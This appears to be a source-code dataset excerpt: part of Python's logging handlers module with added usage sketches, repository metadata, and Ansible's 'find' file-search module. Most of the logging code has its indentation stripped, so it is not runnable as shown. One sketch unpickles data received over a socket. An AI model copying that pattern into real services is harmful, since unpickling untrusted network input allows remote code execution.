"""
self.acquire()
try:
if self.sock:
self.sock.close()
self.sock = None
logging.Handler.close(self)
finally:
self.release()
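# Editor's sketch (not part of the original module): the receiving side of a
# SocketHandler stream, following the class docstring above - read the 4-byte
# length prefix, unpickle the attribute dict and rebuild a LogRecord with
# logging.makeLogRecord. 'conn' is an assumed, already-accepted TCP socket.
def _example_receive_one_record(conn):
    header = conn.recv(4)
    if len(header) < 4:
        return None
    slen = struct.unpack(">L", header)[0]
    data = conn.recv(slen)
    while len(data) < slen:
        data += conn.recv(slen - len(data))
    record = logging.makeLogRecord(pickle.loads(data))
    logging.getLogger(record.name).handle(record)
    return record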
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, (self.host, self.port))
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"security": LOG_AUTH, # DEPRECATED
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = True
self._connect_unixsocket(address)
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_INET, socktype)
if socktype == socket.SOCK_STREAM:
self.socket.connect(address)
self.socktype = socktype
self.formatter = None
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except socket.error:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except socket.error:
self.socket.close()
raise
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
def close (self):
"""
Closes the socket.
"""
self.acquire()
try:
self.socket.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = True # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\000'
"""
We need to convert record level to lowercase, maybe this will
change in the future.
"""
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
try:
if self.unixsocket:
try:
self.socket.send(msg)
except socket.error:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
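# Editor's usage sketch (not part of the original module): logging to the
# local syslog daemon over the /dev/log UNIX socket, as mentioned in __init__
# above. The facility choice is an illustrative assumption.
def _example_syslog_handler():
    logger = logging.getLogger("example.syslog")
    logger.addHandler(SysLogHandler(address="/dev/log", facility=SysLogHandler.LOG_DAEMON))
    logger.error("delivered to the daemon facility of the local syslog")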
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
        A timeout in seconds can be specified for the SMTP connection (the
        default is 5.0 seconds).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, tuple):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, tuple):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.utils import formatdate
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = self.format(record)
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\nDate: %s\r\n\r\n%s" % (
self.fromaddr,
",".join(self.toaddrs),
self.getSubject(record),
formatdate(), msg)
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.sendmail(self.fromaddr, self.toaddrs, msg)
smtp.quit()
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
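# Editor's usage sketch (not part of the original module): emailing ERROR
# records. The mail host, addresses and credentials are placeholder
# assumptions; secure=() requests STARTTLS without key/cert files, as the
# __init__ docstring above describes.
def _example_smtp_handler():
    handler = SMTPHandler(
        mailhost=("smtp.example.com", 587),
        fromaddr="app@example.com",
        toaddrs=["ops@example.com"],
        subject="Application error",
        credentials=("user", "secret"),
        secure=(),
    )
    handler.setLevel(logging.ERROR)
    logging.getLogger("example.smtp").addHandler(handler)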
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
import http.client, urllib.parse
host = self.host
if self.secure:
h = http.client.HTTPSConnection(host)
else:
h = http.client.HTTPConnection(host)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
                s = ('%s:%s' % self.credentials).encode('utf-8')
                s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
h.putheader('Authorization', s)
h.endheaders()
if self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything with the result
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
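# Editor's usage sketch (not part of the original module): shipping records to
# a web endpoint via POST. Host and URL are placeholder assumptions.
def _example_http_handler():
    handler = HTTPHandler("localhost:8080", "/log", method="POST")
    logging.getLogger("example.http").addHandler(handler)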
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer = []
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
self.flush()
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.target = target
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer = []
finally:
self.release()
def close(self):
"""
Flush, set the target to None and lose the buffer.
"""
self.flush()
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
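# Editor's usage sketch (not part of the original module): buffer records in
# memory and only write them out once a record at flushLevel (ERROR by
# default) arrives, per the class docstring above. Capacity and file name are
# illustrative assumptions.
def _example_memory_handler():
    target = logging.FileHandler("buffered.log")
    logger = logging.getLogger("example.memory")
    logger.setLevel(logging.DEBUG)
    logger.addHandler(MemoryHandler(capacity=100, target=target))
    logger.debug("held in the buffer")
    logger.error("at flushLevel, so the whole buffer is written to buffered.log")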
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
if threading:
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._stop = threading.Event()
self._thread = None
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(True)
t.start()
def prepare(self , record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while not self._stop.isSet():
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
pass
# There might still be records in the queue.
while True:
try:
record = self.dequeue(False)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self._stop.set()
self.enqueue_sentinel()
self._thread.join()
self._thread = None
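# Editor's usage sketch (not part of the original module): the queue-based
# pattern described in the QueueHandler/QueueListener docstrings - producers
# log through a QueueHandler while a QueueListener thread drains the queue
# into the real handlers.
def _example_queue_logging():
    log_queue = queue.Queue()
    listener = QueueListener(log_queue, logging.StreamHandler())
    listener.start()
    logger = logging.getLogger("example.queue")
    logger.addHandler(QueueHandler(log_queue))
    logger.warning("formatted and emitted on the listener's thread")
    listener.stop()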
|
gpl-3.0
|
cherusk/ansible
|
lib/ansible/modules/files/find.py
|
27
|
13494
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2014, Ruggero Marchei <[email protected]>
# (c) 2015, Brian Coca <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
module: find
author: Brian Coca (based on Ruggero Marchei's Tidy)
version_added: "2.0"
short_description: return a list of files based on specific criteria
requirements: []
description:
- Return a list of files based on specific criteria. Multiple criteria are AND'd together.
options:
age:
required: false
default: null
description:
- Select files whose age is equal to or greater than the specified time.
Use a negative age to find files equal to or less than the specified time.
You can choose seconds, minutes, hours, days, or weeks by specifying the
first letter of any of those words (e.g., "1w").
patterns:
required: false
default: '*'
description:
      - One or more (shell or regex) patterns, whose type is controlled by the C(use_regex) option.
- The patterns restrict the list of files to be returned to those whose basenames match at
least one of the patterns specified. Multiple patterns can be specified using a list.
aliases: ['pattern']
contains:
required: false
default: null
description:
- One or more regex patterns which should be matched against the file content
paths:
required: true
aliases: [ "name", "path" ]
description:
- List of paths of directories to search. All paths must be fully qualified.
file_type:
required: false
description:
- Type of file to select
- The 'link' and 'any' choices were added in version 2.3
choices: [ "file", "directory", "link", "any" ]
default: "file"
recurse:
required: false
default: "no"
choices: [ "yes", "no" ]
description:
- If target is a directory, recursively descend into the directory looking for files.
size:
required: false
default: null
description:
- Select files whose size is equal to or greater than the specified size.
Use a negative size to find files equal to or less than the specified size.
Unqualified values are in bytes, but b, k, m, g, and t can be appended to specify
bytes, kilobytes, megabytes, gigabytes, and terabytes, respectively.
Size is not evaluated for directories.
age_stamp:
required: false
default: "mtime"
choices: [ "atime", "mtime", "ctime" ]
description:
- Choose the file property against which we compare age. Default is mtime.
hidden:
required: false
default: "False"
choices: [ True, False ]
description:
- Set this to true to include hidden files, otherwise they'll be ignored.
follow:
required: false
default: "False"
choices: [ True, False ]
description:
- Set this to true to follow symlinks in path for systems with python 2.6+
get_checksum:
required: false
default: "False"
choices: [ True, False ]
description:
- Set this to true to retrieve a file's sha1 checksum
use_regex:
required: false
default: "False"
choices: [ True, False ]
description:
      - If false, the patterns are file globs (shell); if true, they are Python regexes.
'''
EXAMPLES = r'''
# Recursively find /tmp files older than 2 days
- find:
paths: "/tmp"
age: "2d"
recurse: yes
# Recursively find /tmp files older than 4 weeks and equal or greater than 1 megabyte
- find:
paths: "/tmp"
age: "4w"
size: "1m"
recurse: yes
# Recursively find /var/tmp files with last access time greater than 3600 seconds
- find:
paths: "/var/tmp"
age: "3600"
age_stamp: atime
recurse: yes
# find /var/log files equal or greater than 10 megabytes ending with .old or .log.gz
- find:
paths: "/var/tmp"
patterns: "*.old,*.log.gz"
size: "10m"
# find /var/log files equal or greater than 10 megabytes ending with .old or .log.gz via regex
# Note that yaml double quotes require escaping backslashes but yaml single
# quotes do not.
- find:
paths: "/var/tmp"
patterns: "^.*?\\.(?:old|log\\.gz)$"
size: "10m"
use_regex: True
'''
RETURN = '''
files:
description: all matches found with the specified criteria (see stat module for full output of each dictionary)
returned: success
type: list of dictionaries
sample: [
{ path: "/var/tmp/test1",
mode: "0644",
"...": "...",
checksum: 16fac7be61a6e4591a33ef4b729c5c3302307523
},
{ path: "/var/tmp/test2",
"...": "..."
},
]
matched:
description: number of matches
returned: success
type: string
sample: 14
examined:
description: number of filesystem objects looked at
returned: success
type: string
sample: 34
'''
import os
import stat
import fnmatch
import time
import re
def pfilter(f, patterns=None, use_regex=False):
'''filter using glob patterns'''
if patterns is None:
return True
if use_regex:
for p in patterns:
r = re.compile(p)
if r.match(f):
return True
else:
for p in patterns:
if fnmatch.fnmatch(f, p):
return True
return False
def agefilter(st, now, age, timestamp):
'''filter files older than age'''
if age is None or \
(age >= 0 and now - st.__getattribute__("st_%s" % timestamp) >= abs(age)) or \
(age < 0 and now - st.__getattribute__("st_%s" % timestamp) <= abs(age)):
return True
return False
def sizefilter(st, size):
'''filter files greater than size'''
if size is None or \
(size >= 0 and st.st_size >= abs(size)) or \
(size < 0 and st.st_size <= abs(size)):
return True
return False
def contentfilter(fsname, pattern):
'''filter files which contain the given expression'''
if pattern is None:
return True
try:
f = open(fsname)
prog = re.compile(pattern)
for line in f:
if prog.match (line):
f.close()
return True
f.close()
except:
pass
return False
def statinfo(st):
return {
'mode' : "%04o" % stat.S_IMODE(st.st_mode),
'isdir' : stat.S_ISDIR(st.st_mode),
'ischr' : stat.S_ISCHR(st.st_mode),
'isblk' : stat.S_ISBLK(st.st_mode),
'isreg' : stat.S_ISREG(st.st_mode),
'isfifo' : stat.S_ISFIFO(st.st_mode),
'islnk' : stat.S_ISLNK(st.st_mode),
'issock' : stat.S_ISSOCK(st.st_mode),
'uid' : st.st_uid,
'gid' : st.st_gid,
'size' : st.st_size,
'inode' : st.st_ino,
'dev' : st.st_dev,
'nlink' : st.st_nlink,
'atime' : st.st_atime,
'mtime' : st.st_mtime,
'ctime' : st.st_ctime,
'wusr' : bool(st.st_mode & stat.S_IWUSR),
'rusr' : bool(st.st_mode & stat.S_IRUSR),
'xusr' : bool(st.st_mode & stat.S_IXUSR),
'wgrp' : bool(st.st_mode & stat.S_IWGRP),
'rgrp' : bool(st.st_mode & stat.S_IRGRP),
'xgrp' : bool(st.st_mode & stat.S_IXGRP),
'woth' : bool(st.st_mode & stat.S_IWOTH),
'roth' : bool(st.st_mode & stat.S_IROTH),
'xoth' : bool(st.st_mode & stat.S_IXOTH),
'isuid' : bool(st.st_mode & stat.S_ISUID),
'isgid' : bool(st.st_mode & stat.S_ISGID),
}
def main():
module = AnsibleModule(
argument_spec = dict(
paths = dict(required=True, aliases=['name','path'], type='list'),
patterns = dict(default=['*'], type='list', aliases=['pattern']),
contains = dict(default=None, type='str'),
file_type = dict(default="file", choices=['file', 'directory', 'link', 'any'], type='str'),
age = dict(default=None, type='str'),
age_stamp = dict(default="mtime", choices=['atime','mtime','ctime'], type='str'),
size = dict(default=None, type='str'),
recurse = dict(default='no', type='bool'),
hidden = dict(default="False", type='bool'),
follow = dict(default="False", type='bool'),
get_checksum = dict(default="False", type='bool'),
use_regex = dict(default="False", type='bool'),
),
supports_check_mode=True,
)
params = module.params
filelist = []
if params['age'] is None:
age = None
else:
# convert age to seconds:
m = re.match("^(-?\d+)(s|m|h|d|w)?$", params['age'].lower())
seconds_per_unit = {"s": 1, "m": 60, "h": 3600, "d": 86400, "w": 604800}
if m:
age = int(m.group(1)) * seconds_per_unit.get(m.group(2), 1)
else:
module.fail_json(age=params['age'], msg="failed to process age")
if params['size'] is None:
size = None
else:
# convert size to bytes:
m = re.match("^(-?\d+)(b|k|m|g|t)?$", params['size'].lower())
bytes_per_unit = {"b": 1, "k": 1024, "m": 1024**2, "g": 1024**3, "t": 1024**4}
if m:
size = int(m.group(1)) * bytes_per_unit.get(m.group(2), 1)
else:
module.fail_json(size=params['size'], msg="failed to process size")
now = time.time()
msg = ''
looked = 0
for npath in params['paths']:
npath = os.path.expanduser(os.path.expandvars(npath))
if os.path.isdir(npath):
''' ignore followlinks for python version < 2.6 '''
for root,dirs,files in (sys.version_info < (2,6,0) and os.walk(npath)) or \
os.walk( npath, followlinks=params['follow']):
looked = looked + len(files) + len(dirs)
for fsobj in (files + dirs):
fsname=os.path.normpath(os.path.join(root, fsobj))
if os.path.basename(fsname).startswith('.') and not params['hidden']:
continue
try:
st = os.lstat(fsname)
except:
msg+="%s was skipped as it does not seem to be a valid file or it cannot be accessed\n" % fsname
continue
r = {'path': fsname}
if params['file_type'] == 'any':
if pfilter(fsobj, params['patterns'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
r.update(statinfo(st))
filelist.append(r)
elif stat.S_ISDIR(st.st_mode) and params['file_type'] == 'directory':
if pfilter(fsobj, params['patterns'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
r.update(statinfo(st))
filelist.append(r)
elif stat.S_ISREG(st.st_mode) and params['file_type'] == 'file':
if pfilter(fsobj, params['patterns'], params['use_regex']) and \
agefilter(st, now, age, params['age_stamp']) and \
sizefilter(st, size) and \
contentfilter(fsname, params['contains']):
r.update(statinfo(st))
if params['get_checksum']:
r['checksum'] = module.sha1(fsname)
filelist.append(r)
elif stat.S_ISLNK(st.st_mode) and params['file_type'] == 'link':
if pfilter(fsobj, params['patterns'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
r.update(statinfo(st))
filelist.append(r)
if not params['recurse']:
break
else:
msg+="%s was skipped as it does not seem to be a valid directory or it cannot be accessed\n" % npath
matched = len(filelist)
module.exit_json(files=filelist, changed=False, msg=msg, matched=matched, examined=looked)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
|
gpl-3.0
|
fnordahl/nova
|
